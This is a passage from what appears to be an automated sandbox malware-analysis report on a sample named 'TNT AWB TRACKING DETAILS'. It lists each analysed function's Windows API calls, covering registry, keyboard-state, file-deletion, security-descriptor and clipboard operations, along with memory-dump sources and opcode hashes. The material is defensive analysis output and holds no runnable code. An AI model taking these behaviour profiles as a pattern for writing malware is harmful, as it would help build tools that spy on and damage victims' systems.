                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F40953
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F4F910,00000000,?,00000000,?,?), ref: 00F409C1
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F40A09
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F40A92
                                                    • RegCloseKey.ADVAPI32(?), ref: 00F40DB2
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F40DBF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: df4738c7166b64bde1edf1d81f86dc969250b8c08372608bcaf1d72938cfd6ff
                                                    • Instruction ID: b426c387991d31b4d71fc5b3a7d5f1c08fb233dff78ecba46f94e0d2ec248d89
                                                    • Opcode Fuzzy Hash: df4738c7166b64bde1edf1d81f86dc969250b8c08372608bcaf1d72938cfd6ff
                                                    • Instruction Fuzzy Hash: 77029F766046119FCB14DF24C945E2ABBE5FF89720F04845DF98AAB362CB31EC45DB81
                                                    Function 00F2F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F2F113
                                                    • _wcscmp.LIBCMT ref: 00F2F128
                                                    • _wcscmp.LIBCMT ref: 00F2F13F
                                                      • Part of subcall function 00F24385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F243A0
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F2F16E
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F179
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F2F195
                                                    • _wcscmp.LIBCMT ref: 00F2F1BC
                                                    • _wcscmp.LIBCMT ref: 00F2F1D3
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2F1E5
                                                    • SetCurrentDirectoryW.KERNEL32(00F78920), ref: 00F2F203
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2F20D
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F21A
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F22C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 67a036684e5f63e344797bf488106cdfd1d9d3801caa13a49c9707e6a75fa855
                                                    • Instruction ID: 382694cc14e6890d59ded3b4821d6f8377a71a4a30ac8f88d11c746deb25805b
                                                    • Opcode Fuzzy Hash: 67a036684e5f63e344797bf488106cdfd1d9d3801caa13a49c9707e6a75fa855
                                                    • Instruction Fuzzy Hash: A431A23690022DAADB109EB4FC49AEE77BC9F46370F104175E904E21A1DB70DE4DEA55
                                                    Function 00F2A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F2A20F
                                                    • __swprintf.LIBCMT ref: 00F2A231
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F2A26E
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F2A293
                                                    • _memset.LIBCMT ref: 00F2A2B2
                                                    • _wcsncpy.LIBCMT ref: 00F2A2EE
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F2A323
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F2A32E
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F2A337
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F2A341
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: b3c48196cfba51c5d392e06c43f6fd64120dc61ef97171ff891cd6a43e395484
                                                    • Instruction ID: 202cf29565af56f2d542e36701244fbea85d5ce18e853b655a1fbc2dd075c39b
                                                    • Opcode Fuzzy Hash: b3c48196cfba51c5d392e06c43f6fd64120dc61ef97171ff891cd6a43e395484
                                                    • Instruction Fuzzy Hash: 4D31C1B590015DABDB20DFA0DC49FEB37BCEF89750F1040B6FA08E2160EB7596489B65
                                                    Function 00F17CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F18202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F1821E
                                                      • Part of subcall function 00F18202: GetLastError.KERNEL32(?,00F17CE2,?,?,?), ref: 00F18228
                                                      • Part of subcall function 00F18202: GetProcessHeap.KERNEL32(00000008,?,?,00F17CE2,?,?,?), ref: 00F18237
                                                      • Part of subcall function 00F18202: HeapAlloc.KERNEL32(00000000,?,00F17CE2,?,?,?), ref: 00F1823E
                                                      • Part of subcall function 00F18202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F18255
                                                      • Part of subcall function 00F1829F: GetProcessHeap.KERNEL32(00000008,00F17CF8,00000000,00000000,?,00F17CF8,?), ref: 00F182AB
                                                      • Part of subcall function 00F1829F: HeapAlloc.KERNEL32(00000000,?,00F17CF8,?), ref: 00F182B2
                                                      • Part of subcall function 00F1829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F17CF8,?), ref: 00F182C3
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F17D13
                                                    • _memset.LIBCMT ref: 00F17D28
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F17D47
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F17D58
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F17D95
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F17DB1
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F17DCE
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F17DDD
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F17DE4
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F17E05
                                                    • CopySid.ADVAPI32(00000000), ref: 00F17E0C
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F17E3D
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F17E63
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F17E77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 5276c48efdfecd9d86a18647ba2d3803226afae6e4897a2c3fbc5d704953c9f4
                                                    • Instruction ID: 849920e186bf10036ec7a74f4e3791a938b29503e5319b8ec6a02aeadd0eca90
                                                    • Opcode Fuzzy Hash: 5276c48efdfecd9d86a18647ba2d3803226afae6e4897a2c3fbc5d704953c9f4
                                                    • Instruction Fuzzy Hash: E1617C75900209AFDF00DFA5DC44EEEBBB9FF44310F148169F819A62A1DB359E45EB60
                                                    Function 00ED66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                    • API String ID: 0-4228276721
                                                    • Opcode ID: 57455cc62df9ff373a472a68d0795caf09c85654d326c40ea1e55207bec5995c
                                                    • Instruction ID: c2bcbfd13cae01b28c599eb370c650a850bfe49e091d9bb19fdb6ae08f391e6a
                                                    • Opcode Fuzzy Hash: 57455cc62df9ff373a472a68d0795caf09c85654d326c40ea1e55207bec5995c
                                                    • Instruction Fuzzy Hash: 6A726C75E002199BDB24CF58C8807EEB7B5FF48710F14816BE959FB291EB709A81DB90
                                                    Function 00F2001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00F20097
                                                    • SetKeyboardState.USER32(?), ref: 00F20102
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F20122
                                                    • GetKeyState.USER32(000000A0), ref: 00F20139
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F20168
                                                    • GetKeyState.USER32(000000A1), ref: 00F20179
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F201A5
                                                    • GetKeyState.USER32(00000011), ref: 00F201B3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F201DC
                                                    • GetKeyState.USER32(00000012), ref: 00F201EA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F20213
                                                    • GetKeyState.USER32(0000005B), ref: 00F20221
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a0987c58619bea77b399051a731311bba2ea35eb6a95fe57afca714c6b56c0a9
                                                    • Instruction ID: e97a2e8fa008819cf819015ca6bea593273d12a6da85cba13ddc25c11fcfca82
                                                    • Opcode Fuzzy Hash: a0987c58619bea77b399051a731311bba2ea35eb6a95fe57afca714c6b56c0a9
                                                    • Instruction Fuzzy Hash: 11511B31D043A829FB34DBA0A8547EABFB49F11390F08459ED9C2561C3DEA49B8CE761
                                                    Function 00F403DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F404AC
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F4054B
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F405E3
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F40822
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F4082F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: 67a328fbb2bd4ae97fb1b709f140854db45002502a134acdcf5db57d2783e624
                                                    • Instruction ID: 5ddfe5bb50017ac8173112a15fea3bbbd9de892dd78368f0956420829503d187
                                                    • Opcode Fuzzy Hash: 67a328fbb2bd4ae97fb1b709f140854db45002502a134acdcf5db57d2783e624
                                                    • Instruction Fuzzy Hash: B8E17F31604204AFCB14DF28C985E2ABBE5FF89714F04856DF94ADB262DB31ED05DB92
                                                    Function 00F383BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • CoInitialize.OLE32 ref: 00F38403
                                                    • CoUninitialize.OLE32 ref: 00F3840E
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00F52BEC,?), ref: 00F3846E
                                                    • IIDFromString.OLE32(?,?), ref: 00F384E1
                                                    • VariantInit.OLEAUT32(?), ref: 00F3857B
                                                    • VariantClear.OLEAUT32(?), ref: 00F385DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: c1c7dda7f6d185aceab50c50b2bf35143ae3030078353ddda1a4d42a84e57765
                                                    • Instruction ID: edc88cc7e3d7c8a10425cfd9b59fd059aac1543a2a622e6a0a755832674a8a4c
                                                    • Opcode Fuzzy Hash: c1c7dda7f6d185aceab50c50b2bf35143ae3030078353ddda1a4d42a84e57765
                                                    • Instruction Fuzzy Hash: E961C0716083129FC710DF24C848F6EB7E8AF457A4F04441DF9859B291CB78ED4AEB92
                                                    Function 00F34164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: c14079d6d28cc11f74d8cb3a095c0627674613d7161ac78eb4f5f2446bf9315a
                                                    • Instruction ID: d6d20665208313f5a751b88cef2df6945cab824d1737d3112310bd8418487633
                                                    • Opcode Fuzzy Hash: c14079d6d28cc11f74d8cb3a095c0627674613d7161ac78eb4f5f2446bf9315a
                                                    • Instruction Fuzzy Hash: CA21B13A6006149FDB01AF60DC09B6A7BA8EF15720F118029FD4AEB2A1DB70BD01EB54
                                                    Function 00F237EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                      • Part of subcall function 00F24A31: GetFileAttributesW.KERNEL32(?,00F2370B), ref: 00F24A32
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F238A3
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F2394B
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F2395E
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F2397B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2399D
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F239B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: e362ebb1a6b1f6f6a2e8ed951ff8f2a7150af9ca287a2ffc4435ba06971c8ae3
                                                    • Instruction ID: 75b396850887187c4d1204baad542c8d684d0bb4c4f89ab804b290a03769c98d
                                                    • Opcode Fuzzy Hash: e362ebb1a6b1f6f6a2e8ed951ff8f2a7150af9ca287a2ffc4435ba06971c8ae3
                                                    • Instruction Fuzzy Hash: 1351D27180515C9ACF01EBA0DA92EEDB7B9AF15310F600069E446B7191EF362F4EDF51
                                                    Function 00F2F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F2F440
                                                    • Sleep.KERNEL32(0000000A), ref: 00F2F470
                                                    • _wcscmp.LIBCMT ref: 00F2F484
                                                    • _wcscmp.LIBCMT ref: 00F2F49F
                                                    • FindNextFileW.KERNEL32(?,?), ref: 00F2F53D
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F553
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: 5512fffeb8db90a349477e3e0080b9cebfe07462e7233e89b6f2884d0d169c3e
                                                    • Instruction ID: 14e05edd59973da005ddb2c12eda37d99b630f11b617712e5fe0e5630d9fbc1e
                                                    • Opcode Fuzzy Hash: 5512fffeb8db90a349477e3e0080b9cebfe07462e7233e89b6f2884d0d169c3e
                                                    • Instruction Fuzzy Hash: B9417B71C1021A9BCF10EF64DC49AEEBBB4FF55320F14407AE819A2291DB319A89EF50
                                                    Function 00ED3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID: 3c$_
                                                    • API String ID: 674341424-4099079164
                                                    • Opcode ID: 160a0797f980236e737dce38accf11b726543828189d98728b77fa7be5b6a45d
                                                    • Instruction ID: de5c9f310c3201e8c358b6121ab20a4a72d1f224ae7b0c1121474a9266fa4551
                                                    • Opcode Fuzzy Hash: 160a0797f980236e737dce38accf11b726543828189d98728b77fa7be5b6a45d
                                                    • Instruction Fuzzy Hash: 7A229A716083019FC724DF24C981BAEB7E4EF84314F00592EF89AA7391DB75E946DB92
                                                    Function 00ED5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 87b1443a5b8e6cb311a16b473250f38b231024cc5db59491af17bb315da63e9b
                                                    • Instruction ID: b66201acff6b68044cf9f24e096bfb5ad4e8721e77c5170b23a4646a9c507f52
                                                    • Opcode Fuzzy Hash: 87b1443a5b8e6cb311a16b473250f38b231024cc5db59491af17bb315da63e9b
                                                    • Instruction Fuzzy Hash: 3E12A971A00609DBDF04CFA5DA81AEEB3F5FF48310F10552AE806B7290EB76AD91DB50
                                                    Function 00F23B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                      • Part of subcall function 00F24A31: GetFileAttributesW.KERNEL32(?,00F2370B), ref: 00F24A32
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F23B89
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F23BD9
